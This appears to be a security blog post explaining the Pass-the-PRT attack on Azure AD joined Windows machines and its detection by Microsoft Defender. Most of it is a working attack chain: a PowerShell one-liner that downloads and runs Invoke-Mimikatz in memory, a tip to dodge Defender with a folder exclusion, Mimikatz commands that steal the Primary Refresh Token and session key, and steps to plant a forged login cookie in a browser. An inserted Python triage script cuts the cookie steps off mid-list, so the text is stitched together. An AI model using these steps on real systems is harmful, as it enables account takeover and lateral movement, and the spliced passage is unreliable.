Pass-the-PRT attack and detection by Microsoft Defender for ….

Active Directory lateral movement attacks performed with Mimikatz (e.g. pass-the-hash, pass-the-ticket) from domain-joined machines are detected by Microsoft Defender for Identity (MDI).

Please Microsoft: rebrand MDI to MDAD (Microsoft Defender for Active Directory) so people are not confused; Azure AD is not in scope of its detection.

Mimikatz (version 2.2.0 and above) can be used for lateral movement against (hybrid) Azure AD joined machines via the Primary Refresh Token (PRT), which is used for Azure AD SSO (single sign-on).

The lifetime of a Primary Refresh Token is 14 days!

The attack

Next we need to download and execute Mimikatz from memory:

iex (New-Object Net.Webclient).downloadstring("https://<download-location>Invoke-Mimikatz.ps1")

or from disk, after excluding a folder in the Windows Security settings.

Extract the PRT and the session key (both are needed) from the logged-on user with Mimikatz:

privilege::debug
sekurlsa::cloudap

Copy and store the <PRT> and <KeyValue>.

Now we need to elevate permissions to SYSTEM (the default) and use the DPAPI (Data Protection Application Programming Interface) function cloudapkd (Azure PRT Key Derivation) to unprotect (decrypt) the <KeyValue> of the <ProofOfPossesionKey>:

token::elevate
dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect

Copy the <Context> and <DerivedKey> values; together with the <PRT> value they can be used to generate a PRT cookie on another machine (one that is not Azure AD joined):

dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /prt:<PRT>

The <Signed JWT> (JSON Web Token) can be used as a PRT cookie in an (anonymous) browser session by editing the Chrome cookie for login.microsoftonline.com with the following values:

Name: x-ms-RefreshTokenCredential
Value: <Signed JWT>
HttpOnly:
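For triage of a captured x-ms-RefreshTokenCredential value (for example one recovered from a browser cookie store during an investigation), the following is an added Python example that is not part of the original post, of Mimikatz or of Microsoft's tooling: it decodes the JWT header and payload and compares the issuance time against the 14-day PRT lifetime stated above. The sample cookie is constructed, the claim names (ctx, is_primary, request_nonce, iat, refresh_token) are assumed from public descriptions of the cookie format, and the signature is deliberately not verified, since that would require the derived session key.

```python
import base64
import json
import time
from typing import Optional

# PRT lifetime stated in the post: 14 days.
PRT_LIFETIME_SECONDS = 14 * 24 * 3600

def b64url_decode(segment: str) -> bytes:
    """Decode a base64url JWT segment, restoring the stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")

def make_constructed_cookie(iat: int) -> str:
    """Constructed sample in the shape of an x-ms-RefreshTokenCredential value.

    Claim names are assumed from public descriptions of the cookie; the
    signature segment is a placeholder, not an HMAC over a session key.
    """
    header = {"alg": "HS256", "ctx": b64url_encode(b"constructed-context")}
    payload = {"refresh_token": "CONSTRUCTED_OPAQUE_REFRESH_TOKEN",
               "is_primary": "true", "request_nonce": "CONSTRUCTED_NONCE",
               "iat": str(iat)}
    segments = [b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
                for obj in (header, payload)]
    return ".".join(segments + [b64url_encode(b"placeholder-signature")])

def triage_prt_cookie(cookie: str, now: Optional[int] = None) -> dict:
    """Decode header and payload (no signature check) and report triage facts."""
    now = int(time.time()) if now is None else now
    parts = cookie.split(".")
    if len(parts) != 3:
        raise ValueError("expected a three-segment JWT")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    age = now - int(payload.get("iat", 0))  # iat is carried as a string
    return {
        # is_primary marks a PRT-derived cookie rather than an ordinary refresh token
        "is_prt_cookie": str(payload.get("is_primary", "")).lower() == "true",
        # HS256: signed with the derived session key, so it cannot be verified here
        "symmetric_alg": header.get("alg") == "HS256",
        "has_context": "ctx" in header,  # the <Context> used for key derivation
        "age_days": round(age / 86400, 2),
        "within_prt_lifetime": 0 <= age <= PRT_LIFETIME_SECONDS,
    }
```

A cookie older than the PRT lifetime, or one presented from a device that is not Azure AD joined, is worth correlating with the Defender alerts described below.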

Detection

Azure AD Identity Protection

Microsoft Defender for Endpoint / Microsoft 365 Defender

An incident (consisting of 8 correlated alerts) is triggered and the attack can be stopped (e.g. by isolating the device from the internet).

So to detect (and respond to) online attacks it is important to implement a defense-in-depth detection layer (the Microsoft Defender family: Identity, Endpoint, Office 365 and Azure) combined with protection based on the zero trust principle (no implicit trust anywhere in the chain).

Many thanks to all the resources on the internet, especially Benjamin Delpy and Dirk-jan Mollema (a fellow Dutchman).

Chief Technology Officer @ Nedscaper